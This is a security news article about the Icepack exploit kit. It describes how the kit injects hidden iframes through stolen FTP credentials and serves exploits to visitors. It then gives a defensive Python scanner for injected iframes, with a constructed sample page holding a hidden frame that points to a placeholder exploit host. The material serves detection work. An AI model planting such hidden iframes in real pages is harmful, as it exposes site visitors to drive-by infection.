Malicious tool Icepack installs malware through exploits
PandaLabs has discovered a new malicious tool that installs malware through exploits. Called Icepack, it is sold on the Internet for US$400. It joins other tools recently detected by PandaLabs, such as Mpack, XRummer, Zunker, Barracuda and Pinch, confirming that a profitable business has grown up on the Internet around creating and selling applications for carrying out malicious actions.
Icepack infects computers as follows. The application accesses a web page and adds to it an iframe reference pointing to the server on which Icepack is installed. The main innovation in Icepack is that the tool inserts the iframe itself; earlier kits such as Mpack required the attacker to access each web page manually and insert it.
When a user visits one of these compromised pages, the iframe silently loads content from the Icepack server, which checks the visitor's computer for vulnerabilities. If it finds one, it delivers the exploit for that vulnerability to the computer. An important feature of Icepack is that it carries exploits for the most recently disclosed vulnerabilities: the newer the flaw, the less likely users are to have applied the update that fixes it.
From then on, the cyber-crook can download any type of malware onto the affected computers. Given the price of the tool, the payload is most likely the kind of malware most often used to steal confidential data for online fraud: Trojans, spyware, bots and the like.
Another innovation of Icepack is that it combines an FTP checker with an iframer. The checker lets cyber-crooks exploit the FTP account credentials stolen from affected computers: each set of credentials is tested to verify that it is still valid. Valid credentials are then passed to the iframer, which logs in to the account and inserts the iframe pointing to Icepack into the pages hosted there. In this way the application starts its "lifecycle" again. Any FTP credentials stored on an infected computer should therefore be treated as compromised, and the sites they give access to should be checked for injected iframes.
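The injection described above (an iframe pointing at an off-site server, typically zero-size or hidden, appended to pages reachable through stolen FTP credentials) is something a site owner can scan for. The following is an added example written for this page, not PandaLabs' or Icepack's code: it parses an HTML file, reports iframes that point off-site, are zero-size or are hidden by style, and flags an iframe that appears after the closing `</html>` tag, which is the signature of a frame appended to the end of a file rather than authored into the page. The sample page and the hostname `exploit-host.invalid` are constructed for the example and are not real indicators.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a legitimate embedded video plus a hidden,
# zero-size iframe appended after </html>, the pattern the article describes.
# "exploit-host.invalid" is a placeholder, not a real Icepack server.
INJECTED_PAGE = """<html><head><title>Shop</title></head>
<body>
<p>Welcome to our shop.</p>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="/help.html" width="400" height="200"></iframe>
</body></html>
<iframe src="http://exploit-host.invalid/index.php" width="0" height="0" style="visibility:hidden"></iframe>
"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({k: (v or "") for k, v in attrs})


def find_suspicious_iframes(html, site_host, allowed_hosts=()):
    """Return [(src, [reasons])] for iframes that look injected.

    site_host: hostname the page is served from; relative src values count as same-site.
    allowed_hosts: third-party hosts the site legitimately embeds (e.g. a video service).
    """
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host
        reasons = []
        if host != site_host and host not in allowed_hosts:
            reasons.append("off-site src %s" % host)
        width = attrs.get("width", "").strip().lower()
        height = attrs.get("height", "").strip().lower()
        if width in ("0", "0px") or height in ("0", "0px"):
            reasons.append("zero-size frame")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via style")
        if reasons:
            hits.append((src, reasons))
    return hits


def iframe_after_document_end(html):
    """True when an <iframe> appears after the closing </html> tag."""
    lowered = html.lower()
    end = lowered.rfind("</html>")
    return end != -1 and "<iframe" in lowered[end:]


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(INJECTED_PAGE, "shop.example",
                                                allowed_hosts=("www.youtube.com",)):
        print("suspicious iframe:", src, "->", ", ".join(reasons))
    if iframe_after_document_end(INJECTED_PAGE):
        print("iframe found after </html>: content was appended to the file")
```

Run it over every HTML file the compromised FTP account can reach, not just the front page; the article's point is that the iframer works from the credentials, so any page in the account is a candidate. A diff against a known-good copy of the site catches injections this heuristic misses, such as a frame given a plausible size.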